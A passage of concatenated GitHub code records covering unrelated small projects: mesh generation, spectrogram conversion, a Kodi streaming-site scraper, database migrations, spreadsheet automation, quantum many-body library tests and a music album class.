self._y, self._z = np.meshgrid(x, y, z, indexing='ij')\n\n for i in range(len(self._x[0, 0, :])):\n self._x[:, :, i] += self._amp_x*np.sin(self._z[0, 0, i]*3.14)\n\n for i in range(len(self._y[:, 0, 0])):\n self._y[i, :, :] += self._amp_y*np.sin(self._x[i, 0, 0]*3.14)\n\n for i in range(len(self._z[0, :, 0])):\n self._z[:, i, :] += self._amp_z*np.sin(self._y[0, i, 0]*3.14)\n","repo_name":"BingHanLin/Curvilinear_Grid_FDM","sub_path":"CUR_GRID_FDM/Geometry/BasicGeometry/CurveRectangularMesh.py","file_name":"CurveRectangularMesh.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14401217163","text":"# Converting audio files to spectrogram\nfrom os import path, listdir\nimport matplotlib.pyplot as plt\nimport librosa\nimport librosa.display\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\nDATA_ROOT = \"../input\"\n\ndef image_generator(audio_file_name, train = None):\n if train:\n audio_file_path = path.join(DATA_ROOT, \"my_train\", \"train_audio\", audio_file_name)\n else:\n audio_file_path = path.join(DATA_ROOT, \"test_data\", \"test_audio\", audio_file_name)\n\n x, sr = librosa.load(audio_file_path, sr=32000)\n X = librosa.stft(x) # for FFT\n Xdb = librosa.amplitude_to_db(abs(X))\n fig = plt.figure(figsize=(14, 14))\n librosa.display.specshow(Xdb, sr = sr, x_axis = \"time\", y_axis = \"hz\")\n plt.axis(\"off\")\n plt.close(fig) # Save images without displaying\n\n image_name = audio_file_name.split(\".\")[0]\n if train:\n fig.savefig(path.join(DATA_ROOT, \"my_train\", \"train_images\",image_name + \".png\"), bbox_inches='tight')\n else:\n fig.savefig(path.join(DATA_ROOT, \"test_data\", \"test_images\",image_name + \".png\"), bbox_inches='tight')\n\n\ntrain_images_list = listdir(path.join(DATA_ROOT, \"my_train\", \"train_audio\"))\ntest_images_list = listdir(path.join(DATA_ROOT, \"test_data\", \"test_audio\"))\n\nfor name in train_images_list:\n image_generator(name, train = True)\nfor name in test_images_list:\n image_generator(name, train = False)","repo_name":"Rishabhdhiman09/Repo-for-BirdCall-Identification","sub_path":"src/audioImage.py","file_name":"audioImage.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18533146028","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------\n# streamondemand.- XBMC Plugin\n# Canale per cineblog01 - anime\n# http://www.mimediacenter.info/foro/viewforum.php?f=36\n# ------------------------------------------------------------\nimport re\n\nfrom core import config, httptools\nfrom platformcode import logger\nfrom core import scrapertools\nfrom core import servertools\nfrom core.item import Item\n\n__channel__ = \"cb01anime\"\n\nhost = \"http://www.cineblog01.video\"\n\n\n# -----------------------------------------------------------------\ndef mainlist(item):\n logger.info(\"[cb01anime.py] mainlist\")\n\n # Main options\n itemlist = [Item(channel=__channel__,\n action=\"list_titles\",\n title=\"[COLOR azure]Anime - Novita'[/COLOR]\",\n url=\"%s/anime/\" % host,\n thumbnail=\"http://orig09.deviantart.net/df5a/f/2014/169/2/a/fist_of_the_north_star_folder_icon_by_minacsky_saya-d7mq8c8.png\"),\n Item(channel=__channel__,\n action=\"genere\",\n title=\"[COLOR azure]Anime - Per Genere[/COLOR]\",\n url=\"%s/anime/\" % host,\n 
thumbnail=\"http://xbmc-repo-ackbarr.googlecode.com/svn/trunk/dev/skin.cirrus%20extended%20v2/extras/moviegenres/Genres.png\"),\n Item(channel=__channel__,\n action=\"alfabetico\",\n title=\"[COLOR azure]Anime - Per Lettera A-Z[/COLOR]\",\n url=\"%s/anime/\" % host,\n thumbnail=\"http://i.imgur.com/IjCmx5r.png\"),\n Item(channel=__channel__,\n action=\"listacompleta\",\n title=\"[COLOR azure]Anime - Lista Completa[/COLOR]\",\n url=\"%s/anime/lista-completa-anime-cartoon/\" % host,\n thumbnail=\"http://i.imgur.com/IjCmx5r.png\"),\n Item(channel=__channel__,\n action=\"search\",\n title=\"[COLOR yellow]Cerca Anime[/COLOR]\",\n extra=\"anime\",\n thumbnail=\"http://dc467.4shared.com/img/fEbJqOum/s7/13feaf0c8c0/Search\")]\n\n return itemlist\n\n\n# =================================================================\n\n# -----------------------------------------------------------------\ndef genere(item):\n logger.info(\"[cb01anime.py] genere\")\n \n return build_itemlist(item,'<select name=\"select2\"(.*?)</select>','<option value=\"([^\"]+)\">([^<]+)</option>',\"list_titles\")\n\ndef alfabetico(item):\n logger.info(\"[cb01anime.py] alfabetico\")\n\n return build_itemlist(item,'<option value=\\'-1\\'>Anime per Lettera</option>(.*?)</select>','<option value=\"([^\"]+)\">\\(([^<]+)\\)</option>',\"list_titles\")\n\ndef listacompleta(item):\n logger.info(\"[cb01anime.py] listacompleta\")\n\n return build_itemlist(item,'<a href=\"#char_5a\" title=\"Go to the letter Z\">Z</a></span></div>(.*?)</ul></div><div style=\"clear:both;\"></div></div>',\n '<li><a href=\"' + host + '([^\"]+)\"><span class=\"head\">([^<]+)</span></a></li>',\"episodios\")\n \n\ndef build_itemlist(item,re_bloque,re_patron,iaction):\n itemlist = []\n\n data = httptools.downloadpage(item.url).data\n\n # Narrow search by selecting only the combo\n bloque = scrapertools.get_match(data, re_bloque)\n\n # The categories are the options for the combo\n matches = re.compile(re_patron, re.DOTALL).findall(bloque)\n scrapertools.printMatches(matches)\n\n for url, titulo in matches:\n itemlist.append(\n Item(channel=__channel__,\n action=iaction,\n fulltitle=titulo,\n show=titulo,\n title=titulo,\n url=host + url,\n plot=\"\"))\n return itemlist\n \n \n# =================================================================\n\n\n# -----------------------------------------------------------------\ndef search(item, texto):\n logger.info(\"[cb01anime.py] \" + item.url + \" search \" + texto)\n\n item.url = host + \"/anime/?s=\" + texto\n\n return list_titles(item)\n\n\n# =================================================================\n\n# -----------------------------------------------------------------\ndef list_titles(item):\n logger.info(\"[cb01anime.py] mainlist\")\n itemlist = []\n\n # Carica la pagina \n data = httptools.downloadpage(item.url).data\n\n # Estrae i contenuti \n patronvideos = '<div class=\"span4\"> <a.*?<img src=\"(.*?)\".*?'\n patronvideos += '<div class=\"span8\">.*?<a href=\"(.*?)\">.*?'\n patronvideos += '<h1>(.*?)</h1></a>.*?<br />(.*?)<br>.*?'\n matches = re.compile(patronvideos, re.DOTALL).finditer(data)\n\n for match in matches:\n scrapedthumbnail = match.group(1)\n scrapedurl = match.group(2)\n scrapedtitle = scrapertools.unescape(match.group(3))\n scrapedplot = scrapertools.unescape(match.group(4))\n scrapedplot = scrapertools.decodeHtmlentities(scrapedplot)\n if scrapedplot.startswith(\"\"):\n scrapedplot = scrapedplot[64:]\n\n ## ------------------------------------------------\n scrapedthumbnail = 
httptools.get_url_headers(scrapedthumbnail)\n ## ------------------------------------------------ \n\n # Añade al listado de XBMC\n itemlist.append(\n Item(channel=__channel__,\n action=\"listacompleta\" if scrapedtitle == \"Lista Alfabetica Completa Anime/Cartoon\" else \"episodios\",\n fulltitle=scrapedtitle,\n show=scrapedtitle,\n title=scrapedtitle,\n url=scrapedurl,\n thumbnail=scrapedthumbnail,\n viewmode=\"movie_with_plot\",\n plot=scrapedplot))\n\n # Put the next page mark\n try:\n next_page = scrapertools.get_match(data, \"<link rel='next' href='([^']+)'\")\n itemlist.append(\n Item(channel=__channel__,\n action=\"HomePage\",\n title=\"[COLOR yellow]Torna Home[/COLOR]\",\n folder=True)),\n itemlist.append(\n Item(channel=__channel__,\n action=\"list_titles\",\n title=\"[COLOR orange]Successivo>>[/COLOR]\",\n url=next_page,\n thumbnail=\"http://2.bp.blogspot.com/-fE9tzwmjaeQ/UcM2apxDtjI/AAAAAAAAeeg/WKSGM2TADLM/s1600/pager+old.png\"))\n except:\n pass\n\n return itemlist\n\n\n# =================================================================\n\n\n# -----------------------------------------------------------------\ndef episodios(item):\n logger.info(\"[cb01anime.py] episodios\")\n\n itemlist = []\n\n # Carica la pagina \n data = httptools.downloadpage(item.url).data\n data = scrapertools.decodeHtmlentities(data)\n\n patron1 = '(?:<p>|<td bgcolor=\"#ECEAE1\">)<span class=\"txt_dow\">(.*?)(?:</p>)?(?:\\s*</span>)?\\s*</td>'\n patron2 = '<a.*?href=\"([^\"]+)\"[^>]*>([^<]+)</a>'\n matches1 = re.compile(patron1, re.DOTALL).findall(data)\n if len(matches1) > 0:\n for match1 in re.split('<br />|<p>', matches1[0]):\n if len(match1) > 0:\n # Estrae i contenuti \n titulo = None\n scrapedurl = ''\n matches2 = re.compile(patron2, re.DOTALL).finditer(match1)\n for match2 in matches2:\n if titulo is None:\n titulo = match2.group(2)\n scrapedurl += match2.group(1) + '#' + match2.group(2) + '|'\n if titulo is not None:\n title = item.title + \" \" + titulo\n itemlist.append(\n Item(channel=__channel__,\n action=\"findvideos\",\n contentType=\"episode\",\n title=title,\n extra=scrapedurl,\n fulltitle=item.fulltitle,\n show=item.show))\n\n if config.get_library_support() and len(itemlist) != 0:\n itemlist.append(\n Item(channel=__channel__,\n title=\"Aggiungi alla libreria\",\n url=item.url,\n action=\"add_serie_to_library\",\n extra=\"episodios\",\n show=item.show))\n\n return itemlist\n\n\n# =================================================================\n\n\n# -----------------------------------------------------------------\ndef findvideos(item):\n logger.info(\"[cb01anime.py] findvideos\")\n\n itemlist = []\n\n for match in item.extra.split(r'|'):\n match_split = match.split(r'#')\n scrapedurl = match_split[0]\n if len(scrapedurl) > 0:\n scrapedtitle = match_split[1]\n title = item.title + \" [COLOR blue][\" + scrapedtitle + \"][/COLOR]\"\n itemlist.append(\n Item(channel=__channel__,\n action=\"play\",\n title=title,\n url=scrapedurl,\n fulltitle=item.fulltitle,\n show=item.show,\n folder=False))\n\n return itemlist\n\n\n# =================================================================\n\n\n# -----------------------------------------------------------------\ndef play(item):\n logger.info(\"[cb01anime.py] play\")\n\n if '/goto/' in item.url:\n item.url = item.url.split('/goto/')[-1].decode('base64')\n data = item.url\n\n\n ## All following code is redundant for anime\n# item.url = item.url.replace('http://cineblog01.pw', 'http://k4pp4.pw')\n\n# if \"go.php\" in item.url:\n# data = 
httptools.downloadpage(item.url).data\n# try:\n# data = scrapertools.get_match(data, 'window.location.href = \"([^\"]+)\";')\n# except IndexError:\n# try:\n# # data = scrapertools.get_match(data, r'<a href=\"([^\"]+)\">clicca qui</a>')\n# # In alternativa, dato che a volte compare \"Clicca qui per proseguire\":\n# data = scrapertools.get_match(data, r'<a href=\"([^\"]+)\".*?class=\"btn-wrapper\">.*?licca.*?</a>')\n# except IndexError:\n# data = httptools.downloadpage(item.url, only_headers=True, follow_redirects=False).headers.get(\"location\", \"\")\n# while 'vcrypt' in data:\n# data = httptools.downloadpage(data, only_headers=True, follow_redirects=False).headers.get(\"location\", \"\")\n# logger.debug(\"##### play go.php data ##\\n%s\\n##\" % data)\n# elif \"/link/\" in item.url:\n# data = httptools.downloadpage(item.url).data\n# from lib import jsunpack\n#\n# try:\n# data = scrapertools.get_match(data, \"(eval\\(function\\(p,a,c,k,e,d.*?)</script>\")\n# data = jsunpack.unpack(data)\n# logger.debug(\"##### play /link/ unpack ##\\n%s\\n##\" % data)\n# except IndexError:\n# logger.debug(\"##### The content is yet unpacked ##\\n%s\\n##\" % data)\n#\n# data = scrapertools.find_single_match(data, 'var link(?:\\s)?=(?:\\s)?\"([^\"]+)\";')\n# while 'vcrypt' in data:\n# data = httptools.downloadpage(data, only_headers=True, follow_redirects=False).headers.get(\"location\", \"\")\n# if data.startswith('/'):\n# data = urlparse.urljoin(\"http://swzz.xyz\", data)\n# data = httptools.downloadpage(data, headers=headers).data\n# logger.debug(\"##### play /link/ data ##\\n%s\\n##\" % data)\n \n\n try:\n logger.debug(\"##### Play data ##\\n%s\\n##\" % data)\n itemlist = servertools.find_video_items(data=data)\n\n for videoitem in itemlist:\n videoitem.title = item.show\n videoitem.fulltitle = item.fulltitle\n videoitem.show = item.show\n videoitem.thumbnail = item.thumbnail\n videoitem.channel = __channel__\n except AttributeError:\n logger.error(\"vcrypt data doesn't contain expected URL\")\n\n return itemlist\n\n\ndef HomePage(item):\n import xbmc\n xbmc.executebuiltin(\"ReplaceWindow(10024,plugin://plugin.video.streamondemand)\")\n","repo_name":"kodirepositoryluxy/KM17_15.01.18-2","sub_path":"addons/temp/7f2aab45-9907-4492-8741-fac27e7e9ac8/channels/cb01anime.py","file_name":"cb01anime.py","file_ext":"py","file_size_in_byte":12036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39220908290","text":"\"\"\"empty message\n\nRevision ID: c355ed6f4dbb\nRevises: ca286a811fcb\nCreate Date: 2020-09-18 18:13:44.202581\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c355ed6f4dbb'\ndown_revision = 'ca286a811fcb'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('artist_genres',\n sa.Column('artist_id', sa.Integer(), nullable=False),\n sa.Column('genre_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['artist_id'], ['Artist.id'], ),\n sa.ForeignKeyConstraint(['genre_id'], ['Genre.id'], ),\n sa.PrimaryKeyConstraint('artist_id', 'genre_id')\n )\n op.add_column('Artist', sa.Column('seeking_description', sa.String(length=500), nullable=True))\n op.add_column('Artist', sa.Column('seeking_venue', sa.Boolean(), nullable=True))\n op.add_column('Artist', sa.Column('website', sa.String(length=120), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('Artist', 'website')\n op.drop_column('Artist', 'seeking_venue')\n op.drop_column('Artist', 'seeking_description')\n op.drop_table('artist_genres')\n # ### end Alembic commands ###\n","repo_name":"ameernasser88/Fyyur","sub_path":"migrations/versions/c355ed6f4dbb_.py","file_name":"c355ed6f4dbb_.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22823857426","text":"from django.urls import path\r\nfrom . import views\r\n\r\n\r\napp_name= 'food'\r\n\r\nurlpatterns = [\r\n path('greet/', views.greet, name='greet'),\r\n path('process/', views.process,name='process'),\r\n path('', views.item,name=\"item\"),\r\n path('<int:item_id>/', views.detail, name='detail'),\r\n path('add/', views.add_item,name=\"add_item\"),\r\n path('update/<int:id>/', views.update_item,name=\"update_item\"),\r\n path('delete/<int:id>/', views.delete_item,name=\"delete_item\"),\r\n \r\n \r\n]\r\n","repo_name":"sabakhan-cpu/food_app","sub_path":"FOODSITE_PROJECT/food/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24275564252","text":"import os\nimport sys\nimport logging\nfrom datetime import date, timedelta\n\nimport gspread_authorize\nimport yandex_data\nimport yandex_data_regions\n\n\ndef get_yesterday_date():\n \"\"\" Get yesterday dates. 
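Returns a DD/MM/YYYY string for (today - 1 day).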
\"\"\"\n\n    delta = timedelta(days=1)\n    return (date.today() - delta).strftime('%d/%m/%Y')\n\n\ndef write_to_spreadsheet(period, regions=None):\n    \"\"\"period: str 'TODAY' or 'YESTERDAY' \"\"\"\n\n    logging.basicConfig(\n        filename=f'{period}.log',\n        level=logging.INFO,\n        format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %H:%M:%S'\n    )\n\n    gc = gspread_authorize.authorize()\n\n    if regions:\n        sheet = f'Regions {period}'\n        worksheet = gspread_authorize.open_sheet(\n            gc, os.getenv('SPREADSHEET_INCOME'), sheet\n        )\n\n        print(worksheet)\n\n        if period == 'hourly':\n            ya_spend = yandex_data_regions.get_expenses('TODAY')\n            date_column = worksheet.cell(2, 1).value.split()\n            today = date.today().strftime('%d.%m')\n            if today in date_column:\n                cell_shift = 7\n                for i in ya_spend:\n                    worksheet.update_cell(2, cell_shift, ya_spend[i])\n                    cell_shift += 3\n\n        if period == 'daily':\n            ya_spend = yandex_data_regions.get_expenses('YESTERDAY')\n            yesterday = get_yesterday_date()\n            date_cell = worksheet.find('{}'.format(yesterday))\n            if date_cell:\n                cell_shift = 7\n                for i in ya_spend:\n                    worksheet.update_cell(date_cell.row, cell_shift, ya_spend[i])\n                    cell_shift += 3\n\n    else:\n        worksheet = gspread_authorize.open_sheet(\n            gc, os.getenv('SPREADSHEET_INCOME'), period\n        )\n\n        print(worksheet)\n\n        if period == 'hourly':\n            ya_spend = yandex_data.get_expenses('TODAY')\n            date_column = worksheet.cell(2, 1).value.split()\n            today = date.today().strftime('%d.%m')\n            if today in date_column:\n                worksheet.update_cell(2, 5, ya_spend)\n\n        if period == 'daily':\n            ya_spend = yandex_data.get_expenses('YESTERDAY')\n            yesterday = get_yesterday_date()\n            date_cell = worksheet.find('{}'.format(yesterday))\n            if date_cell:\n                worksheet.update_cell(date_cell.row, 10, ya_spend)\n\n\nif __name__ == '__main__':\n    period = sys.argv[1]\n    try:\n        regions = sys.argv[2]\n    except IndexError:\n        regions = None\n    write_to_spreadsheet(period, regions)\n","repo_name":"iakovleva/vu_yandex","sub_path":"vu_income/yandex.py","file_name":"yandex.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13925148970","text":"# For a male student: toggle every switch whose number is a multiple of the number he was given.\n# For a female student: around the switch whose number matches the number she was given, find the longest\n# left-right symmetric interval and toggle the state of every switch in that interval.\n# The number of switches in that interval is always odd, since it is symmetric around a single center switch.\n\n\n\n\nn = int(input()) # number of switches\nstates = list(map(int, input().split()))\n# male: 1, female: 2\nnums = int(input()) # number of students\nlst = []\nfor i in range(nums):\n    st, k = map(int, input().split())\n    lst.append(st)\n    lst.append(k)\n\nfor i in range(nums): # 0 1\n    if lst[2*i] == 1:\n        a = lst[2*i+1] # 3\n        for j in range(len(states)): # 0 1 2 3 4 5 6 7\n            if j % a == 0 and j != 0:\n                if states[j-1] == 1:\n                    states[j-1] = 0\n                elif states[j-1] == 0:\n                    states[j-1] = 1\n    elif lst[2*i] == 2:\n        a = lst[2*i+1] # 3\n        if states[a-1] == 0:\n            states[a-1] = 1\n        else:\n            states[a-1] = 0\n\n        idx = []\n        for z in range(len(states)//2): # 0 1 2 3\n            if 0 <= a-z-2 and n > a+z: ## was 'or': with 'or' the branch also ran when a-z-2 < 0 (e.g. z=2 gives 0 <= -1), as long as n > a+z held; both bounds must hold\n                if states[a-2-z] != states[a+z]:\n                    if states[a-1] == 1:\n                        states[a-1] = 0\n                    elif states[a-1] == 0:\n                        states[a-1] = 1\n                elif states[a-2-z] == states[a+z]:\n                    idx.append(a-2-z)\n                    idx.append(a+z)\n            else:\n                for j in range(idx[0], idx[-1]+1):\n                    if states[j] == 1:\n                        states[j] = 0\n                    elif states[j] == 0:\n                        states[j] = 1\n        else:\n            for j in range(idx[0], idx[-1]+1):\n                if states[j] == 1:\n                    states[j] = 0\n                elif states[j] == 0:\n                    states[j] = 
1\n\nprint(states)\n\n\n","repo_name":"seongbiny/algorithm","sub_path":"BOJ/1244.py","file_name":"1244.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"25564405062","text":"from ctypes import *\n\nXEDPARSE_MAXBUFSIZE = 256\nXEDPARSE_MAXASMSIZE = 16\n\nXEDPARSE_ERROR = 0\nXEDPARSE_OK = 1\n\nclass XEDPARSE(Structure):\n _pack_= 8\n _fields_ = [(\"x64\", c_bool),\n (\"cip\", c_ulonglong),\n (\"dest_size\", c_uint),\n (\"cbUnknown\", c_void_p),\n (\"dest\", c_char * XEDPARSE_MAXASMSIZE),\n (\"instr\", c_char * XEDPARSE_MAXBUFSIZE),\n (\"error\", c_char * XEDPARSE_MAXBUFSIZE)\n ]\n\nimport os\nif os.name == 'nt':\n __module = CDLL('XEDParse')\nelif os.name == 'posix':\n __module = CDLL('libXEDParse.so')\n \nXEDParseAssemble = __module.XEDParseAssemble","repo_name":"x64dbg/XEDParse","sub_path":"bindings/XEDParsePython.py","file_name":"XEDParsePython.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":158,"dataset":"github-code","pt":"37"} +{"seq_id":"22930956933","text":"# Takes a genePred formatted tsv\n# Outpus only the longest isoform for each gene_id in genePred format to stdout\n\nfrom collections import defaultdict\nfrom sys import argv\n\nscript, inputFile = argv\n\n# Hold length of each transcript\nlongest = defaultdict(lambda: 0)\nlongest_name = defaultdict(lambda: '')\n\nf = open(inputFile, 'r')\n\nfor line in f:\n\tline = line.strip().split('\\t')\n\tlength = 0\n\tname1 = line[1]\n\tname2 = line[12]\n\texon_starts = line[9].rstrip(',').split(',')\n\texon_ends = line[10].rstrip(',').split(',')\n\tfor start, end in zip(exon_starts, exon_ends):\n\t\tlength += (int(end) - int(start))\n\n\tif length > longest[name2]:\n\t\tlongest[name2] = length\n\t\tlongest_name[name2] = name1\nf.close()\n\nf = open(inputFile, 'r')\nfor line in f:\n\tline = line.strip()\n\tl = line.split('\\t')\n\tname1 = l[1]\n\tname2 = l[12]\n\tif longest_name[name2] == name1:\n\t\tprint(line)\n\t\nf.close()\t\n\n\n","repo_name":"alexpan82/bioinformatics_scripts","sub_path":"gen_util/genePred_longestIso.py","file_name":"genePred_longestIso.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36730909853","text":"import socket\r\nimport random\r\n\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nhost = '127.0.0.1'\r\nport = 12345\r\ns.gettimeout()\r\ns.connect((host, port))\r\nmessage = str(random.randint(1,4))\r\ns.send(message.encode())\r\ndata = s.recv(1024)\r\nprint('Got data from server: {}'. 
format(data.decode()))\r\ns.close()","repo_name":"barrygg/Study","sub_path":"Practice/SQLLite/Server/Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73682947626","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport sys\nimport os.path\nfrom PIL import Image\n\ndst_mask_ = [0x01, 0x02 , 0x04 ,0x08,0x10 ,0x20,0x40,0x80]\n\ndef Image2FrameBuf(fileName) :\n img = Image.open(fileName).convert(\"1\")\n (w,h) = img.size\n if w > 128 or h > 32 :\n print(\"Too Large %d,%d\\n\" % (w,h))\n return\n varname = os.path.splitext(os.path.basename(fileName))[0]\n DRAM_V_FB = [0] * 512\n for y in xrange(h):\n for x in xrange(w):\n if img.getpixel((x,y )) == 0 :\n DRAM_V_FB[(x) + ((y) >> 3 ) * 128] |= dst_mask_[(y) & 0x7]\n\n print(\"static const unsigned char %s_Img[] = {\" % (varname) )\n for x in xrange(512):\n if x % 16 == 0 :\n print(\"\")\n print(\"\\t\" , end='' )\n print(\"0x%02X, \" % (DRAM_V_FB[x] & 0xFF) , end='' )\n print(\"\")\n print(\"};\")\n\n\nif __name__==\"__main__\":\n f = \"logo.png\"\n if len(sys.argv) > 1 :\n f = sys.argv[1]\n Image2FrameBuf(f)\n\n","repo_name":"lvhwa0716/minipanel","sub_path":"bitmapdump/Image2FrameBuf.py","file_name":"Image2FrameBuf.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39473079650","text":"import itertools\nimport netket as nk\nimport networkx as nx\nimport numpy as np\nimport pytest\nfrom netket.hilbert import *\n\nhilberts = {}\n\n# Spin 1/2\nhilberts[\"Spin 1/2\"] = Spin(s=0.5, N=20)\n\n# Spin 1/2 with total Sz\nhilberts[\"Spin 1/2 with total Sz\"] = Spin(s=0.5, total_sz=1.0, N=20)\n\n# Spin 3\nhilberts[\"Spin 3\"] = Spin(s=3, N=25)\n\n# Boson\nhilberts[\"Boson\"] = Boson(n_max=5, N=41)\n\n# Boson with total number\nhilberts[\"Bosons with total number\"] = Boson(n_max=3, n_bosons=110, N=120)\n\n# Qubit\nhilberts[\"Qubit\"] = nk.hilbert.Qubit(100)\n\n# Custom Hilbert\nhilberts[\"Custom Hilbert\"] = CustomHilbert(local_states=[-1232, 132, 0], N=70)\n\n# Heisenberg 1d\nhilberts[\"Heisenberg 1d\"] = Spin(s=0.5, total_sz=0.0, N=20)\n\n# Bose Hubbard\nhilberts[\"Bose Hubbard\"] = Boson(n_max=4, n_bosons=20, N=20)\n\n#\n# Small hilbert space tests\n#\n\n# Spin 1/2\nhilberts[\"Spin 1/2 Small\"] = Spin(s=0.5, N=10)\n\n# Spin 3\nhilberts[\"Spin 1/2 with total Sz Small\"] = Spin(s=3, total_sz=1.0, N=4)\n\n# Boson\nhilberts[\"Boson Small\"] = Boson(n_max=3, N=5)\n\n# Qubit\nhilberts[\"Qubit Small\"] = nk.hilbert.Qubit(N=1)\n\n# Custom Hilbert\nhilberts[\"Custom Hilbert Small\"] = CustomHilbert(local_states=[-1232, 132, 0], N=5)\n\n# Custom Hilbert\nhilberts[\"Doubled Hilbert\"] = nk.hilbert.DoubledHilbert(\n CustomHilbert(local_states=[-1232, 132, 0], N=5)\n)\n\n\n#\n# Tests\n#\n\n\ndef test_consistent_size():\n \"\"\"\"\"\"\n\n for name, hi in hilberts.items():\n # print(\"Hilbert test: %s\" % name)\n assert hi.size > 0\n assert hi.local_size > 0\n if hi.is_discrete:\n assert len(hi.local_states) == hi.local_size\n for state in hi.local_states:\n assert np.isfinite(state).all()\n\n\ndef test_random_states():\n \"\"\"\"\"\"\n nk.random.seed(12345)\n\n for name, hi in hilberts.items():\n assert hi.size > 0\n assert hi.local_size > 0\n assert len(hi.local_states) == hi.local_size\n print(\"name\", name)\n if hi.is_discrete:\n rstate = np.zeros(hi.size)\n local_states = hi.local_states\n for i in 
range(100):\n                hi.random_state(out=rstate)\n                for state in rstate:\n                    assert state in local_states\n\n        assert hi.random_state().shape == (hi.size,)\n        assert hi.random_state(10).shape == (10, hi.size)\n        assert hi.random_state(size=10).shape == (10, hi.size)\n        assert hi.random_state(size=(10,)).shape == (10, hi.size)\n        assert hi.random_state(size=(10, 2)).shape == (10, 2, hi.size)\n\n\ndef test_hilbert_index():\n    \"\"\"\"\"\"\n    for name, hi in hilberts.items():\n        assert hi.size > 0\n        assert hi.local_size > 0\n\n        log_max_states = np.log(nk.hilbert.max_states)\n\n        if hi.is_indexable:\n            assert hi.size * np.log(hi.local_size) < log_max_states\n            print(name, hi.n_states)\n            assert np.allclose(hi.state_to_number(hi.all_states()), range(hi.n_states))\n\n            # batched version of number to state\n            n_few = min(hi.n_states, 100)\n            few_states = np.zeros(shape=(n_few, hi.size))\n            for k in range(n_few):\n                few_states[k] = hi.number_to_state(k)\n\n            print(name)\n            assert np.allclose(\n                hi.numbers_to_states(np.asarray(range(n_few))), few_states\n            )\n\n        else:\n            assert not hi.is_indexable\n\n            with pytest.raises(RuntimeError):\n                hi.n_states\n\n    # Check that a large hilbert space raises error when constructing matrices\n    g = nk.graph.Hypercube(length=100, n_dim=1)\n    op = nk.operator.Heisenberg(hilbert=Spin(s=0.5, N=g.n_nodes), graph=g)\n\n    with pytest.raises(RuntimeError):\n        m1 = op.to_dense()\n    with pytest.raises(RuntimeError):\n        m2 = op.to_sparse()\n\n\ndef test_state_iteration():\n    hilbert = Spin(s=0.5, N=10)\n\n    reference = [np.array(el) for el in itertools.product([-1.0, 1.0], repeat=10)]\n\n    for state, ref in zip(hilbert.states(), reference):\n        assert np.allclose(state, ref)\n\n\ndef test_deprecations():\n    g = nk.graph.Edgeless(3)\n\n    with pytest.warns(FutureWarning):\n        hilbert = Spin(s=0.5, graph=g)\n\n    with pytest.warns(FutureWarning):\n        with pytest.raises(ValueError):\n            hilbert = Spin(s=0.5, graph=g, N=3)\n\n    hi = Spin(0.5, N=2)\n    with pytest.warns(FutureWarning):\n        hi.random_vals()\n","repo_name":"jrm874/1st_quantized_fermions","sub_path":"netket-master/Test/Hilbert/test_hilbert.py","file_name":"test_hilbert.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7175263848","text":"class Album:\n    \"\"\"Album class\"\"\"\n    lst_albums = []\n    name = property()\n    album = property()\n    count_unknown = 0\n\n    def __init__(self, name):\n        \"\"\"Initialization\"\"\"\n        self.__album = []\n        if name:\n            self.__name = name\n        else:\n            Album.count_unknown += 1\n            self.__name = 'Unknown({})'.format(Album.count_unknown)\n        Album.lst_albums.append(self)\n\n    def __str__(self):\n        \"\"\"String representation\"\"\"\n        s = self.__name + '\\n'\n        for song in self.__album:\n            s += '{}\\n'.format(song)\n        return s\n\n    def __repr__(self):\n        \"\"\"Representation\"\"\"\n        return self.name\n\n    @album.getter\n    def album(self):\n        \"\"\"Get the album's song list\"\"\"\n        return self.__album\n\n    @name.setter\n    def name(self, new_name):\n        \"\"\"Set the album name\"\"\"\n        self.__name = new_name\n\n    @name.getter\n    def name(self):\n        \"\"\"Get the album name\"\"\"\n        return self.__name\n\n    def add_song(self, song):\n        \"\"\"Add a song to the album\"\"\"\n        self.__album.append(song)\n\n    def del_song(self, song_name):\n        \"\"\"Remove a song from the album\"\"\"\n        for song in self.__album:\n            if song.name == song_name:\n                self.__album.remove(song)\n                print('Song removed.')\n                return\n        print('Song not found.')\n        return\n\n    @classmethod\n    def 
